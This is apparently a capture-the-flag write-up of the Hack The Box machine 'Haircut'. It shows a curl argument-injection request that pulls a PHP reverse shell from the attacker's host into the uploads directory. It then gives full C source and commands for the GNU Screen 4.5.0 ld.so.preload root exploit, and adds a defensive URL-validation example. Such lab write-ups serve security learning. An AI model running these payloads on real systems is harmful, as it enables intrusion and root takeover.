Summary
Haircut is a medium Linux box. It can be exploited by brute-forcing files and directories on the webserver. This leads to an exposed PHP file that fetches and includes remote files with curl, which can be abused to download a PHP reverse shell into a web-accessible directory. Privileges can be escalated by abusing a vulnerable SUID binary, which provides a root shell.
Discovery
Started off by running NmapAutomator.
Nmap discovered the following open ports and services:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The webserver is of interest, since the SSH version is fairly recent and OpenSSH 7.2 does not have any major known vulnerabilities. The webserver did not show much initially, so it made sense to brute-force for files and directories using the following wordlist:
/home/user/wordlists/directory-list-lowercase-2.3-medium.txt
You will find the following files and directories:
http://10.129.129.32/uploads (Status: 301)
http://10.129.129.32/exposed.php (Status: 200)
The uploads directory does not have directory listing enabled, and further brute-forcing did not yield any new files or directories. The exposed.php file is interesting. It looked as follows:
[screenshot: the exposed.php page]
[image served by the webserver]
This is very interesting, as the page seems to curl any URL you give it and include the response in exposed.php. Initially, I thought the exploitation method would be command injection, but several payloads showed that this input was validated against that and any such attempt was denied.
Exploitation
It was found that you can make the server download files with curl. However, since you cannot retrieve them from a location such as /tmp, this requires you to go back to your initial enumeration: the uploads directory. The trick is to use curl to download a reverse shell and store the output in the uploads directory. It is important to store it there, rather than running the shell through exposed.php, because exposed.php includes the output, which causes problems when executing your reverse shell. So, use the following request in Burp (make sure to URL encode the payload with SHIFT+U):
POST /exposed.php HTTP/1.1
Host: 10.129.129.32
[...]
formurl=http%3a//10.10.14.147/php-reverse-shell.php+-o+uploads/shell.php&submit=Go
This will create the file in the uploads directory. Now you can curl the file and you will receive a shell back:
curl http://10.129.129.32/uploads/shell.php
This will give you access to user.txt.
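The root cause above is argument injection: the formurl value is split into several curl arguments, so `-o uploads/shell.php` becomes an option. The following is an added defensive example (not code from the writeup or from the box) showing the kind of check and invocation that would have blocked it; the function names and validation rules are this example's own.

```python
"""Validate a user-supplied URL before handing it to curl (added example)."""
from typing import List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
SHELL_META = set(";|&$`'\"\\<>()")


def validate_fetch_url(value: str) -> Optional[str]:
    """Return the URL if it is a single, plain http(s) URL; otherwise None.

    Rejects anything that could turn into extra curl options when the
    value is interpolated into a command: whitespace (splits into several
    words), a leading '-' (parsed as a flag), and shell metacharacters.
    """
    if not value or value.startswith("-"):
        return None
    if any(ch.isspace() for ch in value) or any(ch in SHELL_META for ch in value):
        return None
    parts = urlsplit(value)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    return value


def build_curl_argv(value: str) -> Optional[List[str]]:
    """Build an argv list for curl with the URL as one word after '--'.

    Passing a list (no shell) means the value can never be split into
    options, and '--' tells curl to stop option parsing regardless.
    """
    url = validate_fetch_url(value)
    if url is None:
        return None
    return ["curl", "--silent", "--max-time", "10", "--", url]


if __name__ == "__main__":
    # Constructed inputs: a benign fetch and the writeup's decoded payload.
    samples = [
        "http://example.com/index.html",
        "http://10.10.14.147/php-reverse-shell.php -o uploads/shell.php",
        "-o uploads/shell.php",
    ]
    for sample in samples:
        argv = build_curl_argv(sample)
        print(f"{sample!r} -> {'rejected' if argv is None else argv}")
```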
Privilege Escalation
LinPEAS finds an uncommon SUID binary:
[screenshot: LinPEAS output highlighting the uncommon SUID binary]
The color coding indicates that it is most likely exploitable. It stands out due to the version number and because it is an uncommon SUID binary. Searchsploit has an exploit for it:
searchsploit screen priv
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (P | linux/local/41152.txt
The exploitation is a little bit tricky, as it doesn't work right off the bat. You will have to compile the files locally and then transfer them over, due to a compilation error on the server. This can be done by following the steps from the exploit. So, create the following file:
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
/* Runs automatically when the library is loaded via /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);      /* make the helper binary root-owned */
    chmod("/tmp/rootshell", 04755);     /* and set the SUID bit on it */
    unlink("/etc/ld.so.preload");       /* clean up the preload file */
    printf("[+] done!\n");
}
EOF
Now you can compile it with:
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
And the next file to create is:
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    /* execvp takes exactly two arguments: the file and a NULL-terminated argv */
    char *argv[] = { "/bin/sh", NULL };
    execvp("/bin/sh", argv);
    return 1; /* only reached if execvp fails */
}
EOF
Compile that as well:
gcc -o /tmp/rootshell /tmp/rootshell.c
Now, transfer these files from your local machine to the target server (for example with wget on the target). Finally, execute the following commands, in sequence, to obtain a root shell:
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
screen -ls
/tmp/rootshell
This will present you with a root shell if done correctly:
[screenshot: root shell]
Conclusion
I really enjoyed this box, probably my favorite HTB machine so far. I really liked the method to get an initial shell, and the privesc not working instantly is also a nice challenge. It seems very similar to machines from the PWK / OSCP, so this is definitely a good box to practice on. Hope you enjoyed this writeup!